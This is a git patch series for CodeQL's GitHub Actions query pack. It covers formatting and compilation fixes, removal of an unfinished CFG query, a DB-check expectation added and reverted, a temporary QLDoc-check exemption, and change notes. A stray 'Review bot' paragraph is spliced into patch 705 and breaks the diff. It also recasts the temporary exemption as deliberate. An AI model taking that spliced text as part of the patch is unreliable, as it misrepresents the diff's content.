@@ -12,15 +12,14 @@ class UnversionedImmutableAction extends UsesStep { bindingset[version] predicate isSemVer(string version) { // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix - version.regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") - + version + .regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") or // or N or N.x or N.N.x with optional v prefix - or version.regexpMatch("^v?[1-9]\\d*$") - or version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") - or version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") - + version.regexpMatch("^v?[1-9]\\d*$") or + version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") or + version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") or // or latest which will work - or version = "latest" + version = "latest" } predicate isImmutableAction(UsesStep actionStep, string actionName) { diff --git a/actions/ql/lib/ide-contextual-queries/printAst.ql b/actions/ql/lib/ide-contextual-queries/printAst.ql index 9effce3721f5..450f4446e361 100644 --- a/actions/ql/lib/ide-contextual-queries/printAst.ql +++ b/actions/ql/lib/ide-contextual-queries/printAst.ql @@ -26,4 +26,3 @@ class Cfg extends PrintAstConfiguration { n.getLocation().getFile() = getFileBySourceArchiveName(selectedSourceFile()) } } - diff --git a/actions/ql/lib/ide-contextual-queries/printCfg.ql b/actions/ql/lib/ide-contextual-queries/printCfg.ql index d4a90f87f923..4f4d76f5f13c 100644 --- a/actions/ql/lib/ide-contextual-queries/printCfg.ql +++ b/actions/ql/lib/ide-contextual-queries/printCfg.ql 
@@ -7,47 +7,47 @@
* @tags ide-contextual-queries/print-cfg
*/
- private import codeql.actions.Cfg
- private import codeql.actions.Cfg::TestOutput
- private import codeql.actions.ideContextual.IDEContextual
- private import codeql.Locations
-
- /**
- * Gets the source file to generate a CFG from.
- */
- external string selectedSourceFile();
-
- external string selectedSourceLine();
-
- external string selectedSourceColumn();
-
- bindingset[file, line, column]
- private CfgScope smallestEnclosingScope(File file, int line, int column) {
- result =
- min(Location loc, CfgScope scope |
- loc = scope.getLocation() and
- (
- loc.getStartLine() < line
- or
- loc.getStartLine() = line and loc.getStartColumn() <= column
- ) and
- (
- loc.getEndLine() > line
- or
- loc.getEndLine() = line and loc.getEndColumn() >= column
- ) and
- loc.getFile() = file
- |
- scope
- order by
- loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn()
- )
- }
-
- class MyRelevantNode extends RelevantNode {
- MyRelevantNode() {
- this.getScope() =
- smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()),
- selectedSourceLine().toInt(), selectedSourceColumn().toInt())
- }
- }
+private import codeql.actions.Cfg
+private import codeql.actions.Cfg::TestOutput
+private import codeql.actions.ideContextual.IDEContextual
+private import codeql.Locations
+
+/**
+ * Gets the source file to generate a CFG from.
+ */
+external string selectedSourceFile();
+
+external string selectedSourceLine();
+
+external string selectedSourceColumn();
+
+bindingset[file, line, column]
+private CfgScope smallestEnclosingScope(File file, int line, int column) {
+ result =
+ min(Location loc, CfgScope scope |
+ loc = scope.getLocation() and
+ (
+ loc.getStartLine() < line
+ or
+ loc.getStartLine() = line and loc.getStartColumn() <= column
+ ) and
+ (
+ loc.getEndLine() > line
+ or
+ loc.getEndLine() = line and loc.getEndColumn() >= column
+ ) and
+ loc.getFile() = file
+ |
+ scope
+ order by
+ loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn()
+ )
+}
+
+class MyRelevantNode extends RelevantNode {
+ MyRelevantNode() {
+ this.getScope() =
+ smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()),
+ selectedSourceLine().toInt(), selectedSourceColumn().toInt())
+ }
+}
diff --git a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
index 0bc571ad4734..ac8cc249318e 100644
--- a/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
+++ b/actions/ql/src/Security/CWE-829/UnversionedImmutableAction.ql
@@ -14,6 +14,5 @@ import actions
import codeql.actions.security.UseOfUnversionedImmutableAction
from UnversionedImmutableAction step
-select step,
- "The workflow is using an eligible immutable action ($@) without semantic versioning", step,
- step.getCallee()
\ No newline at end of file
+select step, "The workflow is using an eligible immutable action ($@) without semantic versioning",
+ step, step.getCallee()
diff --git a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
index c2259473b9cd..dc65fab292b3 100644
--- a/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
+++ b/actions/ql/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
@@ -12,4 +12,4 @@ import codeql.actions.Violations_Of_Best_Practices.DefaultableCodeQLInitiatlizeActionQuery
from DefaultableCodeQLInitiatlizeActionQuery action
-select action, "CodeQL Action could use default setup instead of advanced configuration."
\ No newline at end of file
+select action, "CodeQL Action could use default setup instead of advanced configuration."
From d66cb7e8c720b537feef48fc45212984f644b591 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 18 Dec 2024 15:48:34 -0500
Subject: [PATCH 699/707] Fix formatting
---
actions/ql/test/library-tests/workflowenum.ql | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/actions/ql/test/library-tests/workflowenum.ql b/actions/ql/test/library-tests/workflowenum.ql
index a4d4eb43bb21..3e0fe866ad3e 100644
--- a/actions/ql/test/library-tests/workflowenum.ql
+++ b/actions/ql/test/library-tests/workflowenum.ql
@@ -2,7 +2,6 @@ import actions
import codeql.actions.config.ConfigExtensions as Extensions
from
- string path, string trigger, string job, string secrets_source, string permissions,
- string runner
+ string path, string trigger, string job, string secrets_source, string permissions, string runner
where Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner)
select trigger, path, job, secrets_source, permissions, runner
From 99bdef12687f97807c9f70932ae487137e240133 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 18 Dec 2024 15:56:49 -0500
Subject: [PATCH 700/707] Fix compilation warnings
---
actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
index 5ceab79820bc..318cd2820a35 100644
--- a/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
+++ b/actions/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
@@ -97,9 +97,9 @@ private module Implementation implements CfgShared::InputSig {
// Not using CFG splitting, so the following are just dummy types.
private newtype TUnit = Unit()
- class SplitKindBase = TUnit;
+ additional class SplitKindBase = TUnit;
- class Split extends TUnit {
+ additional class Split extends TUnit {
abstract string toString();
}
@@ -115,7 +115,7 @@ private module Implementation implements CfgShared::InputSig {
)
}
- int maxSplits() { result = 0 }
+ additional int maxSplits() { result = 0 }
predicate scopeFirst(CfgScope scope, AstNode e) {
first(scope.(Workflow), e) or
From a66ba4ebaec11af3faf0aaf50e89a63187793b4f Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 18 Dec 2024 16:11:54 -0500
Subject: [PATCH 701/707] Remove `printCfg.ql`
This file not yet fully implemented and does not compile
---
.../ql/lib/ide-contextual-queries/printCfg.ql | 53 -------------------
1 file changed, 53 deletions(-)
delete mode 100644 actions/ql/lib/ide-contextual-queries/printCfg.ql
diff --git a/actions/ql/lib/ide-contextual-queries/printCfg.ql b/actions/ql/lib/ide-contextual-queries/printCfg.ql
deleted file mode 100644
index 4f4d76f5f13c..000000000000
--- a/actions/ql/lib/ide-contextual-queries/printCfg.ql
+++ /dev/null
@@ -1,53 +0,0 @@
-/**
- * @name Print CFG
- * @description Produces a representation of a file's Control Flow Graph.
- * This query is used by the VS Code extension.
- * @id actions/print-cfg
- * @kind graph
- * @tags ide-contextual-queries/print-cfg
- */
-
-private import codeql.actions.Cfg
-private import codeql.actions.Cfg::TestOutput
-private import codeql.actions.ideContextual.IDEContextual
-private import codeql.Locations
-
-/**
- * Gets the source file to generate a CFG from.
- */
-external string selectedSourceFile();
-
-external string selectedSourceLine();
-
-external string selectedSourceColumn();
-
-bindingset[file, line, column]
-private CfgScope smallestEnclosingScope(File file, int line, int column) {
- result =
- min(Location loc, CfgScope scope |
- loc = scope.getLocation() and
- (
- loc.getStartLine() < line
- or
- loc.getStartLine() = line and loc.getStartColumn() <= column
- ) and
- (
- loc.getEndLine() > line
- or
- loc.getEndLine() = line and loc.getEndColumn() >= column
- ) and
- loc.getFile() = file
- |
- scope
- order by
- loc.getStartLine() desc, loc.getStartColumn() desc, loc.getEndLine(), loc.getEndColumn()
- )
-}
-
-class MyRelevantNode extends RelevantNode {
- MyRelevantNode() {
- this.getScope() =
- smallestEnclosingScope(getFileBySourceArchiveName(selectedSourceFile()),
- selectedSourceLine().toInt(), selectedSourceColumn().toInt())
- }
-}
From 4743dfa601ebde50d0ee822276c327e2ae6a0494 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 18 Dec 2024 16:22:37 -0500
Subject: [PATCH 702/707] Fix result of `getAPrimaryQlClass()`
---
actions/ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/actions/ql/lib/codeql/actions/ast/internal/Ast.qll b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll
index 77d2bcef3cdf..b0cbb8a1d79e 100644
--- a/actions/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -273,7 +273,7 @@ class ExpressionImpl extends AstNodeImpl, TExpressionNode {
override ScalarValueImpl getParentNode() { result.getNode() = value }
- override string getAPrimaryQlClass() { result = "ExpressionNode" }
+ override string getAPrimaryQlClass() { result = "ExpressionImpl" }
override YamlNode getNode() { none() }
From dba6f0bb9f95e4fc18d4f2a319d296ab68f5a278 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 18 Dec 2024 16:54:34 -0500
Subject: [PATCH 703/707] Accept DB consistency check for now
Failure tracked in https://github.com/github/codeql-team/issues/3655
---
actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected
diff --git a/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected b/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected
new file mode 100644
index 000000000000..8ad775c8995f
--- /dev/null
+++ b/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected
@@ -0,0 +1,5 @@
+[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777215,0,-16777216,1,"tag:yaml.org,2002:bool","on")
+[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777214,0,-16777216,-1,"tag:yaml.org,2002:str","pull_request_target")
+[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777213,0,-16777216,2,"tag:yaml.org,2002:str","jobs")
+[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777211,0,-16777212,1,"tag:yaml.org,2002:str","test")
+[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777210,1,-16777212,-1,"tag:yaml.org,2002:map","runs-on ... -latest")
From 9b9df4c7e018dd74ce878b1e86db8c78528c153e Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Wed, 18 Dec 2024 17:02:02 -0500
Subject: [PATCH 704/707] Temporarily disable QlDoc checks for Actions
https://github.com/github/codeql-team/issues/3656
---
.github/workflows/check-qldoc.yml | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/.github/workflows/check-qldoc.yml b/.github/workflows/check-qldoc.yml
index e64d661c7911..0cb72ed8e147 100644
--- a/.github/workflows/check-qldoc.yml
+++ b/.github/workflows/check-qldoc.yml
@@ -30,7 +30,8 @@ jobs:
run: |
EXIT_CODE=0
# TODO: remove the shared exception from the regex when coverage of qlpacks without dbschemes is supported
- changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared))[a-z]*/ql/lib' || true; } | sort -u)"
+ # TODO: remove the actions exception once https://github.com/github/codeql-team/issues/3656 is fixed
+ changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!0(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)"
for pack_dir in ${changed_lib_packs}; do
lang="${pack_dir%/ql/lib}"
codeql generate library-doc-coverage --output="${RUNNER_TEMP}/${lang}-current.txt" --dir="${pack_dir}"
From 8b132274b574cd2f6eb87869a392e455d737b369 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Thu, 19 Dec 2024 09:47:42 -0500
Subject: [PATCH 705/707] Revert "Accept DB consistency check for now"
This reverts commit dba6f0bb9f95e4fc18d4f2a319d296ab68f5a278.
---
actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected | 5 -----
1 file changed, 5 deletions(-)
delete mode 100644 actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected
diff --git a/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected b/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected
deleted file mode 100644
index 8ad775c8995f..000000000000
--- a/actions/ql/test/query-tests/SyntaxError/DB-CHECK.expected
+++ /dev/null
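Review bot: The new `changed_lib_packs` line carries a stray `0` in the lookahead, `^(?!0(shared|actions))`, so the assertion only rejects paths that begin with a literal `0` and neither `shared/ql/lib` nor `actions/ql/lib` is actually excluded from the coverage check; the intended pattern is `grep -Po '^(?!(shared|actions))[a-z]*/ql/lib'`, which is the correction PATCH 706 later applies, so the two could be squashed. Because this regex is now the only thing that switches the QLDoc gate off for a whole language pack, a short comment next to the TODO stating that the lookahead lists packs deliberately exempt from the check would help the next person who edits it. The enclosing `run:` block continues past the end of the hunk.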
@@ -1,5 +0,0 @@
-[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777215,0,-16777216,1,"tag:yaml.org,2002:bool","on")
-[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777214,0,-16777216,-1,"tag:yaml.org,2002:str","pull_request_target")
-[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777216 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777213,0,-16777216,2,"tag:yaml.org,2002:str","jobs")
-[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777211,0,-16777212,1,"tag:yaml.org,2002:str","test")
-[VALUE_NOT_IN_TYPE] predicate yaml(@yaml_node id, int kind, @yaml_node_parent parent, int idx, string tag, string tostring): Value -16777212 of field parent is not in type @yaml_node_parent. Appears in tuple (-16777210,1,-16777212,-1,"tag:yaml.org,2002:map","runs-on ... -latest")
From bfa105fc0d02579534730c75e990d49fbaeeeb91 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Thu, 19 Dec 2024 10:00:20 -0500
Subject: [PATCH 706/707] Fix typo
---
.github/workflows/check-qldoc.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/check-qldoc.yml b/.github/workflows/check-qldoc.yml
index 0cb72ed8e147..f10e0dc90b99 100644
--- a/.github/workflows/check-qldoc.yml
+++ b/.github/workflows/check-qldoc.yml
@@ -31,7 +31,7 @@ jobs:
EXIT_CODE=0
# TODO: remove the shared exception from the regex when coverage of qlpacks without dbschemes is supported
# TODO: remove the actions exception once https://github.com/github/codeql-team/issues/3656 is fixed
- changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!0(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)"
+ changed_lib_packs="$(git diff --name-only --diff-filter=ACMRT HEAD^ HEAD | { grep -Po '^(?!(shared|actions))[a-z]*/ql/lib' || true; } | sort -u)"
for pack_dir in ${changed_lib_packs}; do
lang="${pack_dir%/ql/lib}"
codeql generate library-doc-coverage --output="${RUNNER_TEMP}/${lang}-current.txt" --dir="${pack_dir}"
From e4bce701a0de2b2637e917c8ff26719d37fc0c35 Mon Sep 17 00:00:00 2001
From: Dave Bartolomeo
Date: Thu, 19 Dec 2024 10:53:23 -0500
Subject: [PATCH 707/707] Add change notes
---
actions/ql/lib/change-notes/2024-12-19-initial-release.md | 4 ++++
actions/ql/src/change-notes/2024-12-19-initial-release.md | 4 ++++
2 files changed, 8 insertions(+)
create mode 100644 actions/ql/lib/change-notes/2024-12-19-initial-release.md
create mode 100644 actions/ql/src/change-notes/2024-12-19-initial-release.md
diff --git a/actions/ql/lib/change-notes/2024-12-19-initial-release.md b/actions/ql/lib/change-notes/2024-12-19-initial-release.md
new file mode 100644
index 000000000000..09263f5089d2
--- /dev/null
+++ b/actions/ql/lib/change-notes/2024-12-19-initial-release.md
@@ -0,0 +1,4 @@
+---
+category: feature
+---
+* Initial public preview release
diff --git a/actions/ql/src/change-notes/2024-12-19-initial-release.md b/actions/ql/src/change-notes/2024-12-19-initial-release.md
new file mode 100644
index 000000000000..e02078ea2731
--- /dev/null
+++ b/actions/ql/src/change-notes/2024-12-19-initial-release.md
@@ -0,0 +1,4 @@
+---
+category: newQuery
+---
+* Initial public preview release